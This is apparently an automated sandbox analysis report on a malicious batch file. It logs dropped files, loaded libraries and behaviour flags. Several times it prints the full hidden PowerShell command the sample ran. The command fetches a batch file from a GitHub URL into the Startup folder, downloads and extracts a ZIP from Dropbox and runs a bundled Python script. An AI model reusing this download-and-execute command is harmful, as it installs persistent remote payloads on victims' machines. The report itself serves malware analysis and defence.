          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\_asyncio.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\_ctypes.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\setuptools\cli-32.exeJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\libffi-7.dllJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\_testconsole.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\setuptools\cli-arm64.exeJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\_socket.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\sqlite3.dllJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\python310.dllJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\winsound.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\_multiprocessing.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\vcruntime140.dllJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\_ctypes_test.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\libssl-1_1.dllJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\_elementtree.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\_hashlib.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\unicodedata.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\select.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\setuptools\cli-64.exeJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\pyexpat.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\charset_normalizer\md.cp310-win_amd64.pydJump to dropped file
          Source: Joe Sandbox ViewDropped File: C:\Users\Public\Document\DLLs\_asyncio.pyd A9A99A2B847E46C0EFCE7FCFEFD27F4BCE58BAF9207277C17BFFD09EF4D274E5
          Source: unicodedata.pyd.2.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
          Source: _overlapped.pyd.2.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
          Source: _testbuffer.pyd.2.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
          Source: classification engineClassification label: mal100.troj.expl.evad.winBAT@16/1793@5/5
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSecure.batJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1516:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7040:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1988:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:180:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ikkdopoj.kx0.ps1Jump to behavior
          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\T3-03-17.bat" "
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\T3-03-17.bat" "
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ty9989/u/raw/main/ud.bat', 'C:\Users\user\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat'); (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/T3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clmk71&dl=1', 'C:\\Users\\Public\\Document.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document'); Start-Sleep -Seconds 1; C:\\Users\\Public\\Document\\python.exe C:\Users\Public\Document\Lib\prt.py; Remove-Item 'C:/Users/Public/Document.zip' -Force"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSecure.bat" "
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "C:\Users\Public\Document\python C:\Users\Public\Document\Lib\prt.py"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\Document\python.exe "C:\Users\Public\Document\python.exe" C:\Users\Public\Document\Lib\prt.py
          Source: C:\Users\Public\Document\python.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
          Source: C:\Users\Public\Document\python.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ty9989/u/raw/main/ud.bat', 'C:\Users\user\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat'); (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/T3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clmk71&dl=1', 'C:\\Users\\Public\\Document.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document'); Start-Sleep -Seconds 1; C:\\Users\\Public\\Document\\python.exe C:\Users\Public\Document\Lib\prt.py; Remove-Item 'C:/Users/Public/Document.zip' -Force" Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\Document\python.exe "C:\Users\Public\Document\python.exe" C:\Users\Public\Document\Lib\prt.pyJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "C:\Users\Public\Document\python C:\Users\Public\Document\Lib\prt.py"Jump to behavior
          Source: C:\Users\Public\Document\python.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"Jump to behavior
          Source: C:\Users\Public\Document\python.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"Jump to behavior
          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\Public\Document\python.exeSection loaded: python310.dllJump to behavior
          Source: C:\Users\Public\Document\python.exeSection loaded: vcruntime140.dllJump to behavior
          Source: C:\Users\Public\Document\python.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\Public\Document\python.exeSection loaded: vcruntime140.dllJump to behavior
          Source: C:\Users\Public\Document\python.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\Public\Document\python.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\Public\Document\python.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\Public\Document\python.exeSection loaded: python3.dllJump to behavior
          Source: C:\Users\Public\Document\python.exeSection loaded: libcrypto-1_1.dllJump to behavior
          Source: C:\Users\Public\Document\python.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\Public\Document\python.exeSection loaded: libssl-1_1.dllJump to behavior
          Source: C:\Users\Public\Document\python.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\Public\Document\python.exeSection loaded: pywintypes310.dllJump to behavior
          Source: C:\Users\Public\Document\python.exeSection loaded: vcruntime140_1.dllJump to behavior
          Source: C:\Users\Public\Document\python.exeSection loaded: vcruntime140_1.dllJump to behavior
          Source: C:\Users\Public\Document\python.exeSection loaded: sqlite3.dllJump to behavior
          Source: C:\Users\Public\Document\python.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\Public\Document\python.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\Public\Document\python.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\Public\Document\python.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\Public\Document\python.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1t 7 Feb 2023built on: Thu Feb 9 15:27:40 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: libcrypto-1_1.dll.2.dr
          Source: Binary string: D:\a\1\b\bin\amd64\python.pdb source: python.exe, 00000013.00000000.2362705216.00007FF606182000.00000002.00000001.01000000.00000007.sdmp, python.exe.2.dr
          Source: Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: vcruntime140.dll.2.dr
          Source: Binary string: and f.endswith(('.exe', '.pdb'))): source: powershell.exe, 00000002.00000002.2527605987.0000023CE62DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE62D2000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: libcrypto-1_1.dll.2.dr
          Source: Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: _overlapped.pyd.2.dr
          Source: Binary string: D:\a\1\b\libcrypto-1_1.pdb source: libcrypto-1_1.dll.2.dr
          Source: Binary string: if not srcfile.endswith(('.exe', '.pdb')): source: powershell.exe, 00000002.00000002.2527605987.0000023CE62DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE62D2000.00000004.00000800.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Suspicious powershell command line found
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ty9989/u/raw/main/ud.bat', 'C:\Users\user\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat'); (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/T3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clmk71&dl=1', 'C:\\Users\\Public\\Document.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document'); Start-Sleep -Seconds 1; C:\\Users\\Public\\Document\\python.exe C:\Users\Public\Document\Lib\prt.py; Remove-Item 'C:/Users/Public/Document.zip' -Force"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "C:\Users\Public\Document\python C:\Users\Public\Document\Lib\prt.py"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ty9989/u/raw/main/ud.bat', 'C:\Users\user\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat'); (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/T3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clmk71&dl=1', 'C:\\Users\\Public\\Document.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document'); Start-Sleep -Seconds 1; C:\\Users\\Public\\Document\\python.exe C:\Users\Public\Document\Lib\prt.py; Remove-Item 'C:/Users/Public/Document.zip' -Force" Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "C:\Users\Public\Document\python C:\Users\Public\Document\Lib\prt.py"Jump to behavior
          Source: python310.dll.2.drStatic PE information: section name: PyRuntim
          Source: vcruntime140.dll.2.drStatic PE information: section name: _RDATA
          Source: libcrypto-1_1.dll.2.drStatic PE information: section name: .00cfg
          Source: libssl-1_1.dll.2.drStatic PE information: section name: .00cfg

          Persistence and Installation Behavior

          barindex
          Tries to download and execute files (via powershell)
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ty9989/u/raw/main/ud.bat', 'C:\Users\user\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat'); (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/T3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clmk71&dl=1', 'C:\\Users\\Public\\Document.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document'); Start-Sleep -Seconds 1; C:\\Users\\Public\\Document\\python.exe C:\Users\Public\Document\Lib\prt.py; Remove-Item 'C:/Users/Public/Document.zip' -Force"
